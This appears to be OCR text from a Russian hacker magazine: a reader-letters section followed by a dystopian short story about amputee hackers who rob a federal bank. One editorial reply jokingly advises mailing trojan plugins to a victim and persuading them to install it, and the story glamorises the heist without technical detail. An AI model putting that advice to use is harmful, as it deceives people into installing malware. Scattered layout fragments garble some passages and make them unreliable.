WITH_PERL=yes 

WITHOUT_PERL=no 
FORCE_PKG_REGISTER=yes 


С уважением, Евгений Штренев 


<CENSORED> 

С уважением, 

Dr. Klouniz (редактор статьи 
«Царь-Хостинг») 


artur@moyapochta.ru 
Артур 
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Здравствуйте, SPEC. 

Можно ли побывать в Вашей тестовой лаборатории и пообщаться 
с Вашими специал.? У меня есть интересные предложения........ 

С уважением, Артур 


Артурчик, привет! 

Очень жалко, что ты не хочешь теснее пообщаться с нашими 
специал., а почему-то выбрал тестовую лабораторию. Жаль. 
Но я обязательно передам твою просьбу Феде Добрянскому, он 
обычно очень рад интеррррресным предложениям. 

Если будешь хорошо стараться, он добавит тебя в следующие 
«Благодарности», которые являются неизбежными спутниками ста- 
тей о харде (не зря же они так называются — hard ;-). 

С любовью, 
твоя противная редакция. 


catcorp@rambler.ru 
help 


Здрасьте, дорогие, многоуважаемые хакеры-спецы! Подскажите мне, 
плиз, как поставить плагины на BO2K 1.1.3, а то я че-то затупил, да 

еще этот англоязычный мануал к одному из плагинов поверг меня в 

сомнения, и мои представления о плагинах стали противоречивыми. 

Заранее спасибо!!! ;-) 


Привет, Кошак. 

Плагины к Заднепроходному Отверстию 2000 версии 1.1.3 ста- 
вятся очень легко. У каждого есть красочная программа уста- 
новки: ты записываешь ее на компакт-диск и высылаешь его 
жертве по почте с поздравительной открыткой. И главное тут — 
отбросить все свои сомнения, потому что тебе нужно убедить 
получателя в абсолютной необходимости установки твоих заме- 
чательных плагинов. И не просто убедить, а еще и загипнотизи- 
ровать, чтобы он не обращал внимания на заголовок окна 
«Trojan (Virus) Installation System». В общем, удачи! Развей все 
сомнения и вперед! © 
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хакер: гражданская казнь 
(взгляд из-под крышки гроба) 


КЛЕЙН УГРЮМО СТОЯЛ У КИРПИЧНОЙ СТЕНЫ И 
ИСПОДЛОБЬЯ ОГЛЯДЫВАЛ ЦЕПОЧКУ АВТОМАТЧИКОВ, 
ОЖИДАВШИХ КОМАНДУ «ОГОНЬ!». 

NIRO (NIRO@REAL.XAKEP.RU) 


Самому себе он казался сейчас растоптанным, раздавленным — до вы- 
стрелов осталась минута, две, максимум пять. В ушах шумело, глаза бы- 
ли полны то ли слез, то ли пыли — он пару раз попытался вытереть, но 
размазал оранжевую кирпичную крошку по лицу и бросил это занятие. 

Когда его вели сюда, командир конвоя не удержался и пнул в 
спину прикладом. Клейн упал, разбив в кровь левую руку; правой ки- 
сти не было, вместо нее — старая грязная повязка, испачканная все 
той же кирпичной крошкой. Подняться удалось с трудом — а они сто- 
яли и смотрели. Ждали. Они могли себе позволить это — процедура 
такова, что без него не начнут. 

Клейн глянул себе под ноги — обломки камней, какие-то ветки, 
пластиковый пакет, принесенный ветром... Пустырь. В паре метров от не- 
го лежала кукла — самая обыкновенная кукла в перепачканном платье, 
с задранными ногами и перепутанными волосами. И с одним глазом... 

— Приготовиться! 

Солдаты, до этого стоящие неподвижно с приставленными к ноге 
автоматами, подняли оружие к груди и щелкнули предохранителями. 

Стволы смотрели куда-то в небо, за спину Клейна. 

Ему захотелось сжать кулаки от бессильной злобы... На левой 
руке хрустнули костяшки пальцев. На правой — дрогнули мускулы 
предплечья. 

Он опять забыл, что кисти нет. Мозг отказывался принимать этот 
факт. Клейн чувствовал кончики пальцев, шевелил ими... Только каза- 

лись они ему какими-то уж очень коротки- 

ми, какими-то детскими. 

— Целься! — Офицер, командовавший про- 
OT КУДА-ТО исходящим, явно гордился собой. «Дурак», 

— подумал Клейн. Солдаты передернули 


С Б 0 КУ затворы и приставили приклады к плечу. 


Ощущение восьми взглядов, воткнув- 
РАЗ ДАЛ | С b шихся тебе в лоб. Или в грудь. Или в живот... 
Взглядов, ответственных за полет пуль. 
Ш АГ И Предательски затряслась нижняя гу- 
и ба. Клейну хотелось верить, что не от стра- 
TY ха, а от неизбежности происходящего. 
КЛ |= | Ш fl В 0 В ЕЛ У него уже было такое ощущение однажды — 
лет семь-восемь назад, еще мальчишкой, 
ПАЛ lb WAM | он с друзьями забрался в магазин к одному 


электронщику... Удирать пришлось через 
окно на втором этаже; и вроде высота была 
небольшая, но он, почувствовав, как отги- 
бается решетка окна и хрустит сварной 
шов, ощутил эту дрожь — не дрожь страха, 
а понимание неизбежности падения... 
Онтогда отделался переломом лодыжки. 


Уполз со слезами боли и обиды. 
Сегодня... Это был далеко не второй этаж. Он отвел глаза от куклы и по- 
смотрел на шеренгу. Встретился взглядом с каждым. Офицер выдержал 
паузу — словно хотел, чтобы Клейн запомнил их всех. Каждого. 
— Огонь! 

Грохнули выстрелы. 

Клейн зажмурился. Со всех сторон полетели кирпичная крошка. 
Больно ужалило в щеки, в шею. Он не понимал, что происходит, 
но стрельба все продолжалась. Ноги ослабели, он упал на колени, 
опершись уцелевшей рукой о землю. 
— Прекратить огонь! 

Тишина навалилась на Клейна, как вата. Рядом от стены отва- 
лился и упал запоздалый кирпич. 
— Процедура окончена! Наблюдателю — зафиксировать! 

Откуда-то сбоку раздались шаги. Клейн провел пальцами по ще- 
ке, почувствовал кровь. 

Человек, подошедший к нему, прошел мимо. Остановился 
в двух шагах от него. Клейн услышал гудение анализатора. 


— Подтверждаю. 
— Налево! — тут же скомандовал офицер. — В расположение шагом 
— марш! 


Клейн поднялся, помотал головой, вытряхивая из волос камешки. 
— Вы свободны, — сказал тот, кого назвали наблюдателем. — Вы огра- 
ничены в правах на пять лет — это довел до вас суд. Желаю вам никогда 
более с нами не встречаться. В следующий раз будут стрелять уже в вас. 

Клейн машинально кивнул. Он все знал. Приговор ему зачитали 
еще три дня назад в федеральной тюрьме. 

— Выход отсюда только один. Во-он там, в конце пустыря — там, в ре- 
шетке, есть маленькие воротца. Охранник в курсе, вас никто не будет 
задерживать. И — предупреждая глупые вопросы — вам никто не ста- 
нет стрелять в спину. У нас все-таки еще правовое государство, хотя 
в его названии присутствует слово «Империя». 

Дыхание восстановилось. Тряска прекратилась. Ныла отсут- 
ствующая правая кисть. Наблюдатель ушел. 

Клейн посмотрел туда, куда они стреляли. 

Рядом с ним возле стены было то, что осталось от его компьюте- 
ра. Груда расстрелянного железа. Простреленный в нескольких ме- 
стах монитор. 

Ему больше не на чем работать. 

— Правовое государство... 

Он повернулся и пошел в указанном направлении. В спину ему 

никто не стрелял. 


Полулежа на большом диване, Клейн прислушивался к своим ощуще- 
ниям. Тяжелый вздох, хруст живых пальцев на левой руке, легкое гу- 
дение сервомоторчиков протеза... 

Его раздражало все — даже воздух. Он будто видел висящее 
перед глазами душное покрывало марева, которое вливалось в лег- 
кие с каждым вдохом, словно «коктейль Молотова» — нечто горячее, 
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плотное, сушащее губы и заставляющее все тело покрываться хо- 
лодной испариной. 

Кондиционер не работал. Спасал Клейна только большой китай- 
ский вентилятор, который работал уже из последних сил. Пара лопа- 
стей его была надломлена, и при вращении на высоких скоростях он 
становился чересчур шумным: стучал по рифленой защите и отвлекал 
от пусть натужного, но все-таки правильного хода мыслей. Клейн про- 
тянул руку, ткнул в среднюю кнопку. 

Стук прекратился. Жара тут же стала сильней. Пришлось вклю- 
чить снова — и ненавистный стук продолжил проникать в сознание, 
словно надоедливый дятел. 

Лето в этом году было не чета последним пяти-шести годам. 
Плавился асфальт; голуби, которым не находилось места в тени крыш, 
погибали. Люди жили в фонтанах — мэрия не стала выключать их на 
ночь, сотни человек набивались в каждый с вечера. Были и жертвы — 
в основном старики, не переносящие жару. Собак забывали в маши- 
нах — для них это был фактически приговор. Спустя два-три часа бед- 
ные звери, в клочья изорвав обивку и потеряв всякую возможность 
лаять, умирали в мучениях. 

Клейн поднес протез к лицу, пощелкал пальцами. Глупо — четыре 
пальца. Но, как говорил Петерсен, достигнута максимальная функцио- 
нальность. Тем более что кнопок у «мыши» в последнее время не стало 
больше. Две и скроллинг. И еще один палец для ковыряния в носу. 

Вообще спасибо этому Петерсену — программа управления про- 
тезом была просто великолепна. Он не угадывал мысли — эта фанта- 
стическая чушь была не свойственна практичному шведу, — но все 
тонкости работы мышц предплечья механическая тварь отрабатывала 
на пять баллов. Иногда Клейн думал, что его настоящая рука не могла 
работать так чутко, откликаясь на малейшее шевеление сгибателей и 
пронаторов. 

Но все-таки живая, настоящая рука была бы, наверное, получше... 

Взгляд упал на стопку дисков возле телевизора. «Хорошо, что 
раскошелился на плазменную панель». Клейн представил, что было 
бы, нагревай сейчас его квартиру еще и труба кинескопа. В стопке бы- 
ла неплохая подборка — почти все фильмы, получившие в разные го- 
ды «Оскара». Тут были и «Английский пациент», и «Титаник», и 
«Храброе сердце», и много чего еще из далекого прошлого... Рядом 
лежала открытая коробка; диск был в плеере. 

Фильм, поразивший Клейна, назывался «Утомленные солнцем». 
Русский блокбастер, получивший «Оскара» в номинации «Лучший ино- 
странный фильм». Фильм, вывернувший душу Клейна наизнанку — да 
так и оставивший ее сушиться на этом самом солнышке... 

Он, как и все американцы, не мог смотреть дублированные 
фильмы — его раздражало несоответствие артикуляции тому, что он 
слышит. Он очень хотел слышать настоящий голос актера, ибо знал, 
сколько всего можно высказать только интонацией, полутонами... И 
поэтому он выбрал фильм с субтитрами. 

Звук казался странным. Приходилось вслушиваться в то, что го- 
ворят артисты. Пару раз по верху экрана мелькнул и тут же пропал ми- 
крофон — Клейн понял, что звук писали напрямую и очень поразился 
тому, что фильм с подобными техническими недочетами смог заво- 
евать столь высокую награду. Но постепенно он адаптировался, даже 
стал соотносить русскую речь непосредственно с субтитрами, хотя по- 
нимал, что для удобства и скорости чтения они явно сокращены в 
сравнении с оригинальными словами в фильме. 

И вдруг... 

«...— Что это за шрам у тебя? Раньше такого не было... — He бы- 
ло ине было. Пустяки. Крышкой зацепило. — Крышкой? Какой крыш- 
кой? — Гроба...». 

Он схватил пульт, остановил кадр. Слегка перемотал назад, пе- 
речитал субтитры. Вслушался в речь. Потом еще. И еще. И еще... 

Клейн понимал, что человек, произнесший эти слова, шутит. Шу- 
тит зло и непринужденно одновременно. И право шутить ему дало то 
прикосновение к смерти, что подарило ему рваный шрам на груди. Он 
мог рассмеяться старухе с косой в лицо, плюнуть ей в душу, если тако- 
вая была, разломать ее оружие и разорвать плащ. 

Клейна не волновал сейчас вопрос русской души, загадочной и 
неповторимой. Любой человек мог оказаться в подобной ситуации. 
Он посмотрел на свой протез и подумал, что теперь всегда будет так 
отвечать на вопросы, касающиеся отсутствия кисти. Он вспомнил, как 
несколько лет назад на суде ему зачитали приговор, а через пару ми- 
нут отрубили правую руку — чтобы он, страшный преступник, неуло- 
вимый хакер, никогда больше не смог взять в руки оружие — манипу- 
лятор типа «мышь». 


Он, конечно, слышал, что так иногда бывает — но был уверен, 
что для подобного наказания нужно совершить какое-то ну уж очень 
серьезное преступление. Оказалось — так бывает гораздо чаще... 

Хлопнула входная дверь. Клейн, не отрывая головы от спинки 
дивана, посмотрел в ту сторону одними глазами. Зашуршала одежда, 
потом об пол что-то стукнуло — и вошел Петерсен. 

Он взглянул на застывшее на экране изображение, прочитал 
название на коробке из-под диска, присел рядом взял пульт и включил 
воспроизведение. 

Вновь зазвучала русская речь. Петерсен пытался читать, слу- 
шать. Спустя полминуты он махнул рукой, выключил плеер и вернулся 
за сумкой, которую оставил в прихожей. 

— Здесь продукты дней на пять, — сказал он, не задавая никаких во- 
просов. — Давай, помоги засунуть все в холодильник. В такую жару 
все пропадет в считанные минуты. 

— Унас опять безвылазная работа? 

— Да, есть возможность неплохо подзаработать. Да и парни из Движе- 
ния требуют от нас активности. 

— Требуют... Ты помнишь свои ощущения, когда тебе на руку накину- 
ли термоудавку? 

Петерсен остановился в дверях, оглянулся на Клейна и медленно 
опустил сумку на пол. 

— Чего это ты вдруг вспомнил? Такие вещи нельзя забыть, но мне ка- 
залось, что разговоры об этом — табу. 

— Табу, конечно... — Клейн встал и подошел поближе, помог со вто- 
рой сумкой. — Но когда она начинает сжиматься, и ты слышишь запах 
паленой кожи, мяса, костей и понимаешь, что твоя рука отделяется от 
тела — о чем ты думаешь в этот момент? И не говори мне, что ты ду- 
мал примерно вот так — «Слава Богу, что я жив; хрен с ней, с рукой, 
новая вырастет!». 

Петерсен покачал головой. Они дошли до холодильника, стали 
выгружать банки, пакеты, разные цветные упаковки. Молчали они до- 
вольно долго, но Клейн знал, что друг обязательно ответит — подума- 
ет и ответит. 

— Конечно, было не так, — сказал Петерсен спустя минут десять. Чув- 
ствовалось, что ему с трудом даются эти воспоминания. — Я помню 
страх. Я помню боль. И еще — во мне было много ненависти. Очень 
много. Я отдавал им свою руку и дал себя клятву взять взамен во мно- 
го раз больше. Взять все их могущество, всю власть, низложить всю 
эту прогнившую империю! 

— Революционер, черт побери... — Клейн надорвал один пакетик, вы- 
тащил кусочек сыра, медленно и задумчиво пожевал. — Ну, взял? 
Взял эту самую власть? 

— Да пошел ты, — огрызнулся Петерсен. — Ты сам видишь, в каком 
мы порой бываем дерьме. Питаемся полуфабрикатами, живем на чу- 
жих квартирах, по поддельным документам. Каждый блюститель по- 
рядка норовит снять с наших рук перчатки — и ведь снимают, после 
чего уже особо не дергаешься и готовишься пару дней провести за ре- 
шеткой до установления личности. 

— Не ной, — прервал его речь Клейн. — Все это я знаю и без тебя. 
Просто... У меня были другие ощущения. Совсем другие. Не нужна мне 
была никакая власть. Для меня это было... Как лишение мужского до- 
стоинства, что ли. Удавка отжигала руку — ия исчезал вместе с ней. 
Становился все тоньше и тоньше. Совру, если скажу, что поклялся 
отомстить. Больше всего я тогда хотел остаться в живых — когда я по- 
нял, что удавка все скоагулировала, что у меня не будет кровотечения, 
я страшно обрадовался. Я так хотел жить — ведь ты помнишь, у меня 
же есть дочь... Была... 

Петерсен сделал вид, что занят своим делом — перекладыванием 
внутри холодильника продуктов. Тема была очень болезненной для 
Клейна. Когда его арестовали, дочь, которой тогда едва исполнилось че- 
тыре года, забрали в спецприемник (жена Клейна умерла при родах, он 
растил девочку один). Чтобы он не смог передать ей свое мастерство. 

Клейн боролся. Уцелев во время расстрела, он принялся искать 
дочь. Безрезультатно. Система хранила свои тайны. Но он не прекратил 
борьбу. Искал — всегда и везде. И случайно встретился с Движением. 

С организацией, составляющей реальную альтернативу суще- 
ствующему правительству. С этаким влиятельным подпольем. 

Он продал ей свои мозги и руки — взамен желая получить коор- 
динаты. Он уповал на связи людей из Движения. На его мощь. На пау- 
тину, опутавшую страну. 

Он никогда не мечтал жить в антиутопии. Впрочем, как и в утопи- 
ческой стране. Но исчезла дочь — и он наплевал на свои принципы. 
— Ты знаешь, Петерсен, зачем они расстреливают компьютеры? 


TOT, закончив с холодильником, вернулся в комнату с банкой пива и 
ждал ответа на риторический вопрос Клейна. 

— Они расстреливают вместе с ним все самое дорогое, что есть у нас. 
Нашу память. Мало того, что они выгребли все из старой квартиры — 
все книги, архивы, фотографии, диски — так они еще и уничтожили все 
то, что хранилось в компьютере. Они прекрасно понимают, Петерсен, 
что программы я восстановлю — или напишу новые. Базы данных вос- 
полню. Умения мои никуда не денутся, руку я с твоей помощью сделал. 
Но видео с моим ребенком, фотографии — они все расстреляли. Все. 
Хотя могли просто стереть. Но нет — это ведь показательная казнь. Ха- 
кер расстается со своим прошлым. И онеще не знает, что придя домой, 
не найдет там своего ребенка — остается сказать им спасибо за то, что 
они делают это не молча, оставляют сопроводительные документы. 

— Клейн, выпей пива, — Петерсен выключил телевизор, прикрыл глаза. 
— Хочешь, я освобожу тебя сегодня от работы. Мне никогда не нравились 
перепады твоего настроения, приступы острой тоски, меланхолии... 

— Даже и не думай, — отрезал Клейн. — Мы всегда работаем вместе. И ты 
это прекрасно знаешь. Или у тебя получится отсекать агентов в одиночку? 
— Вряд ли, — поставив бутылку на подлокотник, покачал головой Пе- 
терсен. — Но все-таки — твой сегодняшний настрой таков, что я лучше 
попробую один, чем возьму тебя с собой. Правда, практики у меня нет, 
но ты же сам всегда говорил — это дело наживное. Потренируюсь на 
мышках, как говорят врачи. 

— Дело серьезное? 

— Унас не бывает мелочей, — Петерсен встряхнул бутылку, посмотрел 
на воронку из пузырьков. — Но и мы сами — крупная рыба. Акулы. Нам 
что попало не поручают. 

— Скажешь тоже... Ты ведь не серьезно? 

— Что «не серьезно»? Что смогу один? — улыбнулся Петерсен. — Ты 
же знаешь — войти я смогу в одиночку, куда пожелаю. А вот выйти без 
твоей помощи — не пробовал. Я вот что хотел спросить — ты всерьез 
воспринял слова этого русского про крышку гроба? Ты ведь знал — и 
знаешь, — что нас бы не казнили с первого раза. Так что о смерти гово- 
рить не приходилось по определению. 

— Всерьез, — после почти минутного раздумья ответил Клейн. — Пото- 
му что сейчас я как никогда НЕ готов к смерти. Я чувствую, что найду 
Шерил. Не могу не найти. И пусть тот расстрел и удавка на руке будут 
той самой крышкой гроба, которая зацепила меня и отошла в сторону, 
дав мне возможность жить дальше. 

— Какая-то мелодраматическая чушь, — отхлебнув пива, ответил Пе- 
терсен. — Ты никогда не умел философствовать. Слушать тебя — одно 
мучение. Я так и не понял, что ты хотел сказать. Ты же знаешь, у меня 
никого нет — ни родителей, ни жены, ни детей. У меня вообще есть 
ощущение, что я изначально был рожден для того дела, которым зани- 
маюсь. Никаких якорей, никаких возможностей для шантажа. Но мой 
компьютер, между прочим, тоже расстреляли. Не знаю, правда, зачем. 
Лишать меня было нечего. Все — здесь. 

И он ткнул пальцем себе в лоб. 

Бутылка покачнулась, Петерсен подхватил ее за горлышко. 

— Сколько можно лирики? — недовольно спросил ону Клейна. — Или 
пей, или готовься к работе. В принципе, для меня это одно и то же. 

Он выцедил себе в рот последние капли пива и отшвырнул буты- 
лку в угол. Она ударилась об стену и откатилась чуть ли не на середину 
комнаты. Клейн проводил ее взглядом, вздохнул и тихо сказал: 

— Везде бардак... В квартирах, на улицах, в головах, в душах... Что за 
работа? 

— Ну, раз уж мы примкнули к оппозиции, то не стоит особо вдаваться в 
мораль. Банальный «экс», как его называли анархисты. Взять в одном 
месте, положить в другое. При этом чем больше возьмем и чем дальше 
спрячем — тем больше процент... 

Клейн взмахом руки остановил его. 

— Акак же идея? Во имя чего все это? 

— Не все ли равно? Вот как ты объяснил агенту Движения то, что при- 
шел кним? 

— Я сказал правду. 

— Какую? Что тебе отрубили руку, потому что ты попался на простом 
взломе?.. 

— Ну, не на простом... Это была ловушка, сделанная качественно и 
людьми, которые на тот момент были на порядок сильнее меня... 

Петерсен закинул ногу на ногу и спросил с довольной физиономией: 
— Так зачем же они взяли хакера, если знали, что против него будут 
играть агенты более профессиональные и более подкованные — во 
всех смыслах? Ты никогда не думал? 

— Я сказал правду, — настойчиво повторил Клейн. — И они поверили. 


А вот что сказал ты? 

— Ничего, — хмыкнул Петерсен. — Я про- 
сто сломал их агентурную базу и дал себя 
вычислить. Все банально. 

— Сломал базу? — недоверчиво перес- 
просил Клейн. — Базу Движения? И что 
там было? 

— Ничего особенного. Списки, адреса, 
банковские счета. Что еще может хранить 
в секрете тайная организация, всеми си- 
лами стремящаяся выйти из подполья? На 
первый взгляд ничего криминального. 
Прежде чем подставиться, я внимательно 
изучил ее — чтобы понять. Понять, кто 
они, зачем они, куда идут. Знаешь, мне ка- 
жется, что то, что мы о них знаем — всего 
лишь верхушка айсберга. Даже нет, не так 


ВЗЛОМЕ? 
— пятачок на этой верхушке, такой малень- 
кий, что мы с тобой там не поместимся. 


— Не поскользнуться бы на этом айсберге... А ты не пробовал копнуть 
глубже? 

— Насколько? До выстрела в затылок? — Петерсен усмехнулся. — Про- 
бовал, пробовал. Думаю, если бы я сказал «нет», ты бы мне не поверил. 

Клейн кивнул в ответ. 

— И что там — в глубине? 

— Клейн, давай поживем еще немного. Хотя бы пару лет, — Петерсен 
встал с кресла, подошел к окну. — У меня есть кое-какие планы — мер- 
твому они мне не по силам. 

— Они настолько сильны и мстительны? 

— Дело не в этом, — Петерсен продолжал смотреть в окно. Клейну не 
нравилось, что напарник не смотрит ему в глаза. — Как любая система, 
которая может влиять на политическую ситуацию в стране и владеет об- 
ширными финансовыми и людскими резервами, она хранит в тайне 
слишком много информации. Не ровен час, кто-нибудь пронюхает, как 
они заработали свой первый доллар — и доверие, словно хрустальная 
ваза, разобьется. А ты ведь знаешь, что очернить очень легко — а от- 
мыться потом бывает просто невозможно. Там, в тех местах, куда я по- 
пал во время своей первой и последней попытки, спрятана информа- 
ция, способная, как мне кажется, сильно поколебать авторитет Движе- 
ния. Я коснулся ее лишь краешком сознания — и решил тихо и мирно 
уйти, не оставляя следов. 

— Но ведь владеть такой информацией — значит иметь возможность 
диктовать Движению свои условия! — загорелись глаза у Клейна. 

— Можешь уже начинать диктовать свое завещание, — грубо ответил 
Петерсен. — Уже не отделаешься одной рукой. Убьют. И тебя, и меня. 
— Тебя-то за что? — приподнял брови Клейн. — Каким образом ты по- 
падешь под подозрение? Только исходя из того, что нас поселили вме- 
сте — а значит, мы просто обязаны вступить в сговор? 

— Примерно так, — согласился Петерсен. — И если ты сейчас начнешь 
просить меня вспомнить мои попытки взлома секретных баз — я набью 
тебе морду. А могу и просто так — авансом. 

Клейн кивнул, соглашаясь. 

— Просить не буду. Сам скажешь. 
— Не сходи с ума. Лучше давай по-быстрому прошвырнемся в Сеть, возь- 
мем, что плохо лежит — а потом ты продолжишь свою философию. 

Пожав плечами, Клейн щелкнул механическими пальцами и ушел 
в другую комнату. 

— Не забудь выключить вентилятор! — крикнул он оттуда. — Во время 
работы раздражает! 

Петерсен взял пульт, махнул им в сторону жужжащей машины. 
Движение воздуха замерло — жара тут же накинулась, вцепившись 
мертвой хваткой в каждую клеточку тела. 

— Ничего, потерпим... 

Он переключил на протезе микротумблер, выставив скорость дви- 
жения пальцев на максимум. Пошевелил: глаза не успели отметить ни- 
чего — настолько все было быстро. Только легкая вибрация по пред- 
плечью — Петерсен кивнул сам себе, подошел к зеркальному шкафу, 
отодвинул в сторону створку, открыв доступ к компьютеру. Правую руку 
он теперь держал на отлете, стараясь не прикасаться ей ни к чему. 

Сел в кресло, надел гарнитуру, спросил: 

— Ты там? 

— Точно, — раздалось в наушниках. — Руку на максимум? Потом так 
болит плечо... 

— Глупый вопрос. Мне зайти проверить — или сам? 
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— Сам. Все, сделал. Куда сегодня? 

— Федеральный банк. Я там на днях неплохую лазейку оставил... 

— А как они узнали? 

— Что? 

— Ну, что у тебя есть наработки? Они же тоже нормальные люди, хо- 
тят, чтобы все получилось, куда попало не пошлют. 

Петерсен замялся. 

— Не хочешь, не говори, — Клейн уже был готов извиниться за то, что 
влез не в свое дело. Наверняка Петерсен на доверии у Движения, они 
планируют все акции вместе — исходя из его возможностей. 

Клейн всегда отдавал пальму первенства своему другу — тот 
был на порядок сильнее. Навыки хакера, фрикера, программиста бы- 
ли у него в крови. Иногда складывалось впечатление, что для него не 
существует невыполнимых задач — настолько легко он находил ре- 
шение в сложных, практически неразрешимых ситуациях. Клейн шел 
за ним безо всякой опаски — он был уверен в благоприятном исходе 
любого мероприятия. 

На этот раз Петерсен не стал ничего усложнять и поручил Клей- 
ну то, что поручал всегда — роль информационного воздействия. От 
Клейна требовалось войти на сервер федерального банка с макси- 
мально возможным шумом. Войти, стучаться во все порты, дерзить 
всем файрволам, подбирать пароли, короче — хулиганить так, чтобы 
его заметили и выкинули, проявив все чудеса своей защиты. А Петер- 
сен тем временем под прикрытием такого явного вторжения должен 
был сделать свое дело и тихонько смыться. 

Клейн положил руки на клавиатуру, зажмурился до боли в веках, 
стряхнул усталость, резко открыл глаза и начал. 

Пальцы правой руки со скоростью молнии летали по клавишам — 
одной из задач Клейна было создание иллюзии массовой атаки. Он 
подключался к банку одновременно с нескольких десятков прокси- 
серверов, сканируя открытые порты и забивая их всяким информа- 
ционным мусором. В наушниках он слышал дыхание Петерсена, кото- 
рый в это время просматривал логи и внимательно изучал активность 
администратора. 

Служба компьютерной безопасности банка оказалась на высоте. 
Активность Клейна была замечена на тринадцатой секунде. Это гово- 
рило о TOM, что человек в банке не просто получает свои деньги — OH 
внимателен и быстр. Заслоны перед Клейном стали вырастать один 
за другим. В первые несколько минут это его не останавливало — 
снежный ком запросов был готов утопить компьютеры федералов. Но 
постепенно Петерсен стал замечать, что девятый вал атаки постепен- 
но ослабевает — банковские безопасники не просто отсекали входя- 
щие, они уже отключили восемь прокси из тридцати четырех, которые 
использовал Клейн. Девять... Десять... Потом еще сразу четыре. 

У них была возможность не просто отслеживать. У банка был 
карт-бланш на подобные операции — похоже, правительство давало 
им допуск к вынесению ультиматума владельцам анонимных серверов. 
— Жми, Клейн, жми... шептал Петерсен, постукивая механическими 
пальцами по столу. Его вторжение уже началось — Клейн отвлекал 
на себя все силы защитников банка своими кибер-молотами и кибер- 
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Петерсен смотрел на прогресс-бар, по которому медленно, 
но верно ползла к финишу голубая полоска, и молчал. Клейн спросил 
еще раз, потом замолчал. 

А еще через полторы минуты деньги прибыли по назначению. 
— Готово, — коротко сказал Петерсен. — Смываемся. 

— Есть, — ответил Клейн и одним движением правой руки, в котором 
невидимо для глаз слились около пятидесяти нажатий клавиш, обор- 
вал все нити, ведущие в их квартиру. 

Люди по ту сторону Сети споткнулись о пустоту, прекратили 
борьбу и спокойно вздохнули. 

Из отдела по работе с клиентами им позвонили только через ше- 
стнадцать часов — когда один из сильных мира сего не обнаружил на 
своем счету пары миллионов. 

«Экс» удался. 


Звук ключа, поворачиваемого в замке, застал Клейна врасплох. 
По крайней мере, на первый взгляд это выглядело именно так. 

Петерсен вошел в квартиру и увидел, что его друг сидит за ком- 
пьютером. За его, Петерсена, компьютером, выдвинутым из зеркаль- 
ного шкафа. Клейн вскочил со стула, резко повернулся к распахнутой 
двери и уронил стул. 

Они смотрели друг на друга довольно долго — минут пять. Никто 
не произносил ни слова. Просто стояли и смотрели; Петерсен дышал 
тяжело и зло, Клейн — быстро, взволнованно. Глаза сверлили глаза; 
металлические пальцы сухо и часто пощелкивали. 

— Этим должно было кончиться, — сказал после молчания Петерсен, 
делая шаг навстречу. — Зря я тебе тогда сказал о базах, о Движении, 
о своих умениях и возможностях. Ой как зря — теперь мне придется 
06 этом очень и очень пожалеть. А уж тебе — тем более. 

Он подошел к шкафу, мельком взглянул на экран, скривился 
и сразмаху закрыл дверь. Зеркало задребезжало; Клейн вздрогнул 
и отодвинулся на пару шагов в сторону. 

— Ставим эксперименты? — спросил Петерсен. — Надо мной, над со- 
бой? Смотри, даже пива выпил для храбрости... А то ведь не угово- 
ришь. Я компьютер от тебя никогда не прятал, ты же знаешь. Все мои 
инструменты на нем тебе известны. Но, однако же, ты знал, что суще- 
ствуют и ограничения — причем очень и очень серьезные... 

Клейн кивнул. Голова у него слегка кружилась от выпитого пива, 
но он еще не потерял способность соображать. 

— Яне позволял тебе подбирать пароли, если ты на них натыкался. 
Ведь так? Так. У каждого есть свои секреты — даже у меня. И даже 
от тебя. Все мы люди. Самые обыкновенные люди. 

— Не все, — вдруг сказал Клейн. — Извини, вырвалось... 

Петерсен споткнулся об это замечание Клейна, замолчал и сде- 
лал вид, что к чему-то прислушивается. 

— Что? Ты что-то сказал? Не может быть! — Петерсен всплеснул ру- 
ками. — Я застаю моего давнего друга за компьютером в тот момент, 
когда он просматривает один из запароленных каталогов — и онеще 
пытается оправдываться! 

— Что же мне остается... — начал было Клейн, но Петерсен внезапно 
за секунду преодолел разделяющие их несколько шагов и ударил 
Клейна в живот. Тот сложился пополам, задохнулся и повалился на 
пол. С губ сорвался то ли стон, то ли кашель. Петерсен перешагнул 
через него, сел в кресло. 

— Ты же способный человек, Клейн, — продолжил он, как ни в чем не 
бывало. — Ты легко обучаешься. Ты очень быстро принимаешь реше- 
ния. Порой быстрее, чем я — но тут вопрос спорный. Да и вообще — 
не в быстроте дело. Тут, я думаю, тебя выручает мой протез, кинема- 
тика в нем на высочайшем уровне. Ты меня слышишь? Хоть бы кивнул 
для приличия. 

— Слышу, — очень тихо отозвался Клейн. — За что ... ты меня ударил? 
— Ты сунул свой нос не в свое дело. 

— Убей меня за это... — Клейн приподнялся и сел у стены. — Ты же 
знаешь, как я хочу найти своего ребенка — и ты скормил мне эту пи- 
люлю с информацией о том, что ломал базы Движения. Ведь там на- 
верняка были подробности о моей Шерил... 

— Яне искал твою дочь. Я даже не знал тогда о ее существовании. 
Можно сказать, я сделал маленький «экс» — я украл их пароли. Меж- 
ду прочим, ты понятия не имеешь об оборотной стороне дела — дума- 
ешь, наверное, что меня сразу возвели в ранг героя и доверили самые 
сложные дела? Ну уж нет — я тоже сполна хлебнул дерьма. И умылся 
кровью. Вот так же, как и ты сейчас, получил по морде, пролежал в ка- 
ком-то изоляторе без еды и питья пару дней. И потом стал чертовски 
сговорчивым, Клейн! Правда, я и не стремился скрыть от них ничего — 


наоборот, хотел с ними работать. И вот теперь ты напоминаешь мне 
меня самого — влез в чужой компьютер и лежишь, утирая кровь с раз- 
битого лица. Насчет лица — это, конечно же, аллегория. Хотя надо бы- 
ло бы сломать тебе нос. По дружбе. 

Он откинулся в кресле, сложил руки на груди и задумался. Клейн 
встал, пошел на кухню, налил себе воды, выпил стакан. Каждый вдох 
отдавался болью — Петерсен приложил его очень и очень крепко. 

Он вспомнил все то, что успел увидеть в компьютере Петерсена. 
Чертежи, схемы, исходники... Присел на табуретку. 

— Не зря я подобрал эти чертовы пароли, — похвалил он сам себя. — 
ОЙ, не зря... 

Сзади послышались шаги. Петерсену надоело ждать, он пришел 

сам, сел рядом. 

— Что ты искал там? 

— Яне хочу об этом говорить, — не поднимая глаз, сказал Клейн. — 
Просто ты подарил мне надежду... Я хотел найти способ повторить 
твой взлом. Хоть какие-то факты, хоть что-то... 

Петерсен вздохнул. 

— Этот компьютер мне предоставило Движение. Мне не оставили ни- 
чего личного, разрешив только захватить с собой коробку с програм- 
мами и пару книжек по программированию. Там — только новые нара- 
ботки. Ничего, что было бы связано с тем взломом. 

Клейн кивнул. 

— Извини, что я так... Отреагировал. Мерещится всякое... 

